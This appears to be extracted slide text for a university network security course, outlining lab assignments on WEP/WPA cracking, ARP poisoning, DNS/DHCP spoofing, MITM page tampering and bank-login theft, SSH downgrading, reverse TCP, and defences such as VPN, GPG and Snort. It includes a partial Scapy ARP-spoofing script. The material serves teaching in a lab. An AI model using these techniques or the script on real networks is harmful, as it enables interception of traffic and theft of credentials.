TIES327 Network Security (3-5 ECTS)

(1)

TIES327 – Network Security (3-5 ECTS)

Prof. Timo Hämäläinen

[email protected]

Department of Mathematical Information Technology IT Faculty

(2)

Important note!

If you have completed the "old course" TIES326 in year

2012 or 2013, you will not get credits from this

TIES327, as its' content has more than 50% similar

assignments as TIES326 has in 2012 and 2013.

Those students who has completed TIES326 before

(3)

Goals of the course

Students understand what the term "security" keep

inside in particular in the networks and services point of view

... get familiar with the different security aspects and to understand

the necessary terms

…are cabable to apply the various tools in auditing and protecting

against network attacks

... learn to look for a new knowledge about this area

The feeling of safety can not to be

ignorance !

The course focuses on hands-on making of the security issues

and learning by doing different networking security exercises

(4)

Prerequisites

• Basic knowledge about networks, TCP/IP- protocols

and programming

• For example courses (or similar knowledge)

• ITKP101- Tietokone ja tietoverkot työvälineenä

• ITKP104 – Tietoverkot

(5)

How to complete course ?

• Complete assignments

• Group of 1-3 students

• You should get at least 50% of total points and at least the same 50% of the each assignments.

• 3 ECTS fulfilment: complete assignments 1-9 • 4 ECTS fulfilment: complete assignments 1-11 • 5 ECTS fulfilment complete all 13 assignments

• Different network attack configurations, tools for protecting and analysing networks

• MITM, WLAN cracking, VPN, Firewall, IDS etc. • pfSense: http://www.pfsense.org/

• Snort: http://www.snort.org/

• Radamsa: http://code.google.com/p/ouspg/wiki/Radamsa • Wireshark: http://www.wireshark.org/

• Scapy: http://secdev.org/projects/scapy/

• Kali Linux: http://www.kail.org/

(6)

About the assignments

1. Virtual network configuration

• In this first assignment, you will create and configure virtual

network which will be used for testing different kinds of network

attack.

• To do this you need an PC with 2 Gb of RAM (bigger is of course

better!).

• We have used Ubuntu, but it is of course possible to make the

same virtual network configuration, if you have Windows or Mac

OS by using corresponding commands.

(7)

(8)

2: Security in social media/students presentations

(lecture 3)



Group of 1-4 students will make a presentation. The topic is security in

social media (duration of the presentation 20- 25 min).



Presentation should have the following aspects. Even better, if you

can

create

own

live demo like eg.

http://www.youtube.com/watch?v=-H1qjiwQldw:

1. What kind of threats/attacks there exist in social media ?

• Social engineering, phising, Spam, code-injections, XSS, CSRF/XSRF, DDoS etc.

2. How can you protect against these threats ?

3. Possibilities and drawbacks of Web technologies

• Asynchronous JavaScript And XML (AJAX), Cascading Style Sheet (CSS), Flash, JSON ja XML etc.



All groups will return

www- link (no attachment !)

to their presentation

by 9.11 time 23:59 to: [email protected].

(9)

About the assingments

3. WEP Cracking

• In this assignment you are going to crack a WEP key with tools available at: http://aircrack-ng.org/

• It is intended to build your basic skills and get you familiar with the wireless network security concepts.

• It assumes you have a working wireless card with drivers already patched for injection.

• The basic concept behind this work is using aireplay-ng, which will replay an ARP packet to generate new unique IVs.

• In turn, aircrack-ng uses the new unique IVs to crack the WEP key.

(10)

4. WPA Cracking

• This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys. • We recommend you do some background reading to better understand what WPA/WPA2 is.

• WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys.

• So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

• There is another important difference between cracking WPA/WPA2 and WEP. • This is the approach used to crack the WPA/WPA2 pre-shared key.

• Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2.

• That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack.

• The only thing that does give the information to start an attack is the handshake between client and AP.

• Handshaking is done when the client connects to the network.

• Although not absolutely true, for the purposes of this assignment, consider it true.

• Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

(11)

5. ARP Poisoning

• In this assignment you are going to perform two Man-In-The-Middle (MITM) attacks: poisoning ARP tables and redirecting ICMP traffic

• ARP poisoning is also known as ARP Spoofing, ARP Flooding and ARP Poisoning Routing.

• So what basically is ARP poisoning ?

• It is technique which allows an attacker sniffs traffic from LAN, monitors it and even stop it.

• ARP poisoning is done by sending fake or spoofed messages to an

Ethernet LAN card.

• By doing so an attacker manages to associate its MAC address with IP address of another node on network (which is basically default gateway IP).

(12)

5. ICMP Redirection

• ICMP (Internet Control Message Protocol) is used to send error messages, report problems and for routing purposes.

• When the router sends to the client for route redirection and indicates a shorter route to some particular destination, a host-route entry is added to the clients routing table.

• The attacker can change the clients routing table so as traffic from the client to a web server will be redirected to the attacker.

• For this purpose the attacker sends ICMP redirect message to the client, in which source IP is the gateway, source IP for redirection is the client,

destination IP for redirection is the web server and gateway is the attacker. • After the client updates its routing table with the web servers IP address

(13)

6. DNS spoofing

• In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS and DHCP servers.

• The Domain Name System translates names that human can understand to IP addresses. • First, the client sends DNS query and the DNS server responds with DNS response.

• The DNS query and response have identical ID number and query.

• Then the client updates its DNS cache entries accordingly domain name and IP address.

• Assume that the attacker wants to change the clients DNS cache so that traffic from client to the domain web.seclab,jyu.fi. will be redirected to the attackers server 192.168.1.102.

• For this purpose the attacker snifs DNS queries from the client and waits for DNS query with the relevant query, then the attacker spoofs a DNS response e.g. with the attacker's IP.

• Client updates its DNS cache and therefore all traffic goes to the attacker. Attacker repeats to spoof DNS responses to maintain a valid cache.

• However DNS query eventually arrives the DNS server and the server will respond with a legitimate DNS response.

• When the client gets the legitimate response, it will update its cache.

(14)

6. DHCP spoofing

• The DHCP (Dynamic Host Configuration Protocol) is used to configure network settings to hosts on IP networks.

• DHCP allows hosts to be dynamically configured with IP address, subnet mask, gateway address and DNS server address.

• It works as follows: first, the client sends (broadcasts) DHCP discover containing transaction ID.

• The DHCP server responds with DHCP offer which contains the same transaction ID.

• The client then sends DHCP request and the DHCP server responds with DHCP Ack.

(15)

6. DHCP spoofing

• After getting this request the attacker spoofs a DHCP offer with assigning malicious gateway or/and DNS server.

• After that the client responds with DHCP request and the attacker spoofs a DHCP Ack as well.

• Finally, the client updates its DNS server and gateway addresses. • However, when DHCP discover arrives the DHCP server this server

responds to the client with a legitimate DHCP offer.

• If the client gets the legitimate offer first then DHCP spoofing will not work. • For this reason, the attacker DoS the DHCP server during the attack so as

DHCP server can not respond to clients.

(16)

7. Annoying HTTP server and bank attack

• This assignment explains deals with two Man-In-The-Middle (MITM) attacks: annoying HTTP server and bank attack.

• Once an attacker has been located in the middle between his victim and other network nodes, he can easily change HTTP requests and responses which go through him.

• In this section, the attacker changes web pages which the victim requested from a web site to make the victim feel nervous.

• For this attack, the attacker first poisons the ARP cache of the victim in order to be "in the middle".

• Then when the victim requests a web page he modifies all pictures contained on the page and sends the result to the victim.

Bank attack

• In this section, we use the case when the attacker places himself "in the middle" and then steals money from the victim's bank account, when the victim logs in to the system.

(17)

8. SSH downgrading

• Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers that it connects via a secure channel over an insecure network.

• The protocol specification distinguishes two major versions that are referred to as SSH-1 and SSH-2.

• Here we consider the most famous example of a downgrade attack where the attacker forces the client and the server to use the insecure SSH-1 protocol.

• The client sends a request to establish a SSH link to the server and asks it for the version it supports. The server answers either with:

- ssh-2.xx, i.e. the server supports only SSH-2,

- ssh-1.99, i.e. the server supports SSH-1 and SSH-2, - ssh-1.51, i.e. the server supports only SSH-1.

• In our example, the server is configured to support both SSH-1 and SSH-2 and the client is set to use SSH-2 and SSH-1 but SSH-2 as a preference.

• In this case the hacker if he already is located in the middle (e.g. after applying ARP poisoning) will change the answer by modifying the "1.99" string to "1.51" to indicate to the client that the server supports only SSH-1 and thus forces the client to open a SSH-1 link.

(18)

9. Reverse TCP attack

• Man-In-The-Middle attacks can be combined with such dangerous attacks as reverse TCP connection.

• A firewall usually blocks open ports, but does not block outgoing traffic, therefore a reverse connection is used to bypass firewall and router security restrictions.

• For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet.

• Once the connection is established, the remote host can send commands to the Trojan horse.

• Trojan horses that use a reverse connection usually send SYN (TCP) packets to the attacker's IP address.

(19)

10. Configuring VPN connection with the help of

OpenVPN

• This assignment is used to configure OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates. • In addition, it describes dual-factor authentication based on username and

password, which are used by the server for authenticating a connecting client.

(20)

11. Public-key cryptography with GNU Privacy Guard

• Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party

generates a "keypair“ consisting of a "public" key and a "secret/private" key.

• Each party can then publish their "public" key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have Person's public key, you can do a few things with it:

• Encrypt a message that only that Person can decrypt (they need their secret key to decrypt it).

• Validate that Person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted nor modified in transmission.

• With your secret key, you can do following things:

• Decrypt messages encrypted with your public key.

• Sign messages that others can verify came from you (they need your public key to verify the signature).

• This assignment explains how to configure and use Public Key Infrastructure (PKI), encrypt les and sign emails by using GNU Privacy Guard (GPG).

(21)

12. Configuration of Snort and pfSense

• In this assignment you are going to install, configure and tune Snort and pfSense for protecting your network.

• Snort is a free and open source network intrusion prevention system and network intrusion detection system (signature based)

(22)

13. Network traffic anomaly detection

• In this assignment, HTTP access log file is preprocessed into a numerical matrix, anomalous queries are found using dimensionality reduction and clustering, and finally anomalous log lines are analyzed.

• In this exercise, it is assumed that some kind of Linux distribution is used (running in virtualbox etc. is ne)

• Windows installation might be possible, but it is much easier on Linux. • In the following examples, Octave software is used

• In addition, we need the package octave-statistics. • If available, Matlab uses the same syntax.

(23)

Tools used in assignments

Kali Linux

http://www.kali.org/

(24)

Some tools used in assignments

Python https://www.python.org/

Scapy

http://secdev.org/projects/scapy/

Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.

It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.).

(25)

Tools used in assignments

Python scripts ARP poisoning ICMP Redirection DNS spoofing DHCP spoofing Annoying HTTP server Bank attack SSH downgrading Other files

Login database for the bank server Certificate file for the bank server Bank server

(26)

An example: ARP poisoning (Python)

from scapy.all import * from time import sleep import threading import os, sys

class SpoofThread (threading.Thread): def __init__(self, victim, gateway):

self.packet = ARP()

self.packet.psrc = gateway self.packet.pdst = victim threading.Thread.__init__(self) def run (self):

counter = 0

print "spoofing " + str(self.packet.pdst) + " every 5 seconds..." try:

while 1:

send(self.packet, verbose=0); counter += 1

print 'poison #' + str(counter) sleep(5); except Exception as e: print type(e) print e.args print e pass if __name__ == '__main__': if len(sys.argv) != 3:

sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128 192.168.72.2' % os.path.basename(__file__))

targets_dest_ips = [sys.argv[1]] spoofed_src_ip = sys.argv[2] for ip in targets_dest_ips:

(27)

Course grading

Total points

Grade

55

5

50

4

45

3 40 2

30 1

Work load

(28)

About the lectures



The lectures are intended to provide introduction to various

networking security topics and examples



The course focuses on hands-on making of the security issues and

learning by doing (not learning by listening !).



Some literature:

• Lot of research papers

• - IEEE Explore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp

- ACM, http://portal.acm.org/dl.cfm

- Google scholar, http://scholar.google.com/

– http://site.ebrary.com/lib/jyvaskyla

• Introduction to Network Security

• Hacking Exposed Web 2.0 : Web 2.0 Security Secrets and Solutions

(29)

L1: Introduction to the network security



What is security and what are the goals



Threats of networks and IT- systems

(30)

L2: Recent networking security threats/malwares

(visiting lecture by Matti Kannela)

(31)

L3 : Security in social media (students presentations)

Assignment no. 2

